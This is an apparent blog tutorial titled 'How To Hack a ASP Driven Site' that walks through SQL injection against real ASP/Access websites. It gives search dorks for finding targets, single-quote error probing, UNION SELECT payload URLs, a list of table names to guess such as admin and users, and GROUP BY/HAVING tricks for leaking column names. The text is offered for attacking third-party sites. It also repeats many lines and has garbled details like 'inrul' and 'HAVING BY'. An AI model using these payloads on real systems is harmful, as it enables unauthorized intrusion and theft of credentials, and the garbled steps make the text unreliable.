How To Hack a ASP Driven Site
Step 1:
——
Good dork: site:.org inurl:.asp?id=
site:.com inrul:.aspx?=
Good dork: site:.org inurl:.asp?id=
site:.com inrul:.aspx?=
site:.co.uk inurl:.asp?cid=
Or you can figure out your own dork.
Or you can figure out your own dork.
Step 2:
——-
——-
Lets say we found this
Code:
http://www.site.com
we will crawl around it until we get to this
Code:
http://www.site.com/en/pressread.asp?id=563
We should see normal page is on. i will to put single quote and see what we could come up with, the resultant URL is
Code:
http://www.site.com/en/pressread.asp?id=563'
Now you should see and error like this,
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘id=563′ ;’.
/en/includes/configdb.asp, line 23
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘id=563′ ;’.
/en/includes/configdb.asp, line 23
the error msg on the second like says that we have great chance to inject here, so we proceed with the 1+and+1 test,
Code:
http//www.site.com/en/pressread.asp?id=563+AND+1=1#
NOTE:
—-
In asp we will use the # for commenting the rest of the query instead of — or /* .
If you got an error says type mismatch like int or string something, we can figure out that the input is being checked
for data type. if you insist then we should find a site that accepts both int and char in the input.
—-
In asp we will use the # for commenting the rest of the query instead of — or /* .
If you got an error says type mismatch like int or string something, we can figure out that the input is being checked
for data type. if you insist then we should find a site that accepts both int and char in the input.
Now we are going to use AND+1=0#
Code:
http://www.site.com/en/pressread.asp?id=563+AND+1=0#
if you got incomplete page on or such and error on,
ADODB.Field error ’800a0bcd’
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 44
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 44
Now we need to find the column number, for that we will use ORDER BY command
Microsoft OLE DB Provider for ODBC Drivers error ’80004005′
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize ’10′ as a valid field name or
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize ’10′ as a valid field name or
expression.
/en/includes/configdb.asp, line 23
/en/includes/configdb.asp, line 23
that error like our MySQL error unknown Column ’10′. we will keep on decreasing untill we are on the correct number.
for out example that should be … 9
for out example that should be … 9
Code:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9#
at this point you should see another error,
Microsoft OLE DB Provider for ODBC Drivers error ’80004005′
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 23
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 23
the query will not execute. because the query needs an existing table to successfully execute, we will keep guessing
until we get existing table, otherwise we will get this error:
until we get existing table, otherwise we will get this error:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e37′
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ‘admin’.
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query ‘admin’.
Make sure it
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23
exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23
that error means the table used does not exist, possible tables that works most of the time are;
user
username
users
admin
administrator
login
news
sysobjects
customers
………….
username
users
admin
administrator
login
news
sysobjects
customers
………….
Our example will be OK with table admin and ….
Code:
http://www.site.com/en/pressread.asp?id=563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7+from+admin#
We should still see the error and ignore it and look up besides the ‘PRESS RELEASES >’ you should see number 4
at this point i think any smart guys can find out about columns names …etc.
at this point i think any smart guys can find out about columns names …etc.
Step 3:
——
We can find the columns names by using HAVING BY, for example
——
We can find the columns names by using HAVING BY, for example
Code:
HAVING 1=1 --
GROUP BY table.columnfromerror1 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and on and on ..
0 comments:
Post a Comment